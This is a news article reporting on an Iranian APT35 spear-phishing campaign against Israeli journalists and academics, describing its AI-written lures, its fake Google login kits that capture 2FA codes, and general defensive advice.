Iranian state-sponsored hackers, linked to the Islamic Revolutionary Guard Corps (IRGC) and tracked as APT35, have launched a new wave of spear-phishing attacks targeting journalists, cybersecurity experts, and computer science professors in Israel.
The attackers pose as fictitious assistants to technology executives or researchers, contacting their targets via email and WhatsApp.
Victims are directed to fake Gmail login pages or Google Meet invitations, which are designed to harvest login credentials and two-factor authentication (2FA) codes.
What Tactics and Tools Are Being Used in These Campaigns?
The campaign, tracked as Educated Manticore, leverages artificial intelligence to generate highly convincing messages, often referencing current geopolitical tensions to increase urgency and credibility.
The phishing kits look very similar to real Google login pages, automatically filling in victims' email addresses and using up-to-date web technologies like React-based Single Page Applications (SPA) and real-time WebSocket connections to steal data.
The kits also include passive keyloggers to capture keystrokes if victims abandon the process.
Did you know?
APT35, also known as Charming Kitten and Phosphorus, is one of the most active Iranian state-sponsored hacking groups, conducting long-term cyber espionage campaigns against government, defense, and critical infrastructure targets worldwide.
Why Is This Campaign Especially Dangerous
The use of AI allows attackers to craft messages without grammatical errors and tailor them to individual targets, making detection more difficult. The phishing pages capture login credentials and bypass 2FA protections, enabling attackers to gain full access to victims’ accounts.
The rapid setup and takedown of phishing infrastructure make it challenging for defenders to track and disrupt these operations.
ALSO READ | Cyber Fattah Leak Exposes Saudi Games Data and Fuels Regional Tensions
How Do These Attacks Fit into the Broader Geopolitical Context
The campaign coincides with heightened tensions between Iran and Israel, with attacks intensifying after the outbreak of the Iran-Israel war in mid-June 2025.
APT35 has a long history of targeting Israeli professionals and institutions, using social engineering and custom malware to conduct cyber espionage and credential theft.
The group’s activities are part of a broader pattern of Iranian cyber operations targeting critical infrastructure, government, and private sector organizations in Israel and beyond.
What Are the Implications for Cybersecurity and Defense
The persistence and sophistication of APT35’s campaigns demonstrate the need for enhanced vigilance and advanced threat detection measures.
Organizations and individuals must remain alert to phishing attempts, implement robust authentication controls, and conduct regular security awareness training.
The use of AI in phishing attacks is likely to increase, requiring continuous updates to defensive strategies and technologies.
Comments (0)
Please sign in to leave a comment